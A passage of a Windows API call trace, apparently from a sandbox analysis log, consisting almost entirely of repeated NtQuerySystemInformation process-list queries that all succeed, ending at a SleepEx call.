SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe448) returned 0x0 [0238.179] SleepEx 